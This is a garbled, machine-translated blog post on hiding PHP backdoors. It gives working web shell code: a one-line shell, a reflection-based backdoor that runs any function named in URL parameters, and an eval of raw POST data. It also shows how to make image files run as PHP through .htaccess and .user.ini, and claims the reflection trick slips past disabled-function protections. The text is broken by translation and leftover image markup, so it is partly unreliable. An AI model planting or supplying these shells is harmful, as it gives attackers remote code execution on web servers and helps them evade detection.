A word and big horse
Phpspy kitchen knife sentence <[email protected] ($_post[' cmd ');? >
Reflective rear Door
<?php
$func = new Reflectionfunction ($_get[m]);
echo $func->invokeargs (Array ($_get[c));
?>
Calls such asX.php?m=system&c=whoami
Backdoor can also bypass some detection disabledprotection systems for system functions
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/71/F3/wKioL1Xb046TwKuSAAFeKjmO5E8685.jpg "title=" 123. PNG "alt=" wkiol1xb046twkusaafekjmo5e8685.jpg "/>
Php:input
php://input is used to receive post data (here is an introduction to Php://input)
<?php
@eval (file_get_contents (' php://input '))
?>
Post Submission system (' WhoAmI ');
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/71/F7/wKiom1Xb0a-g6deDAAGsFg0VclM281.jpg "title=" 123. PNG "alt=" wkiom1xb0a-g6dedaagsfg0vclm281.jpg "/>
. htaccess ( requires webserver support )
You can set any suffixYou can also set the UTF7 encoding format shell
AddType application/x-httpd-php. jpg
and then send another one . JPG at the end of the Shell, accessed to execute the
. User.ini ( requires fastcgi coordination )
Dynamically modifying the php.ini configuration file
User.ini
Auto_prepend_file=demo.gif(ready to use php://input test not successful do not know why)
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/71/F4/wKioL1Xb1bmB5I0tAAPHUavTxYk671.jpg "style=" float: none; "title=" 123.png "alt=" Wkiol1xb1bmb5i0taaphuavtxyk671.jpg "/>
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/71/F7/wKiom1Xb06XRSXAMAAUxl_yg5-s902.jpg "style=" float: none; "title=" 222.png "alt=" Wkiom1xb06xrsxamaauxl_yg5-s902.jpg "/>
This article is from the "Sanr" blog, make sure to keep this source http://0x007.blog.51cto.com/6330498/1687963
PHP Backdoor hiding tips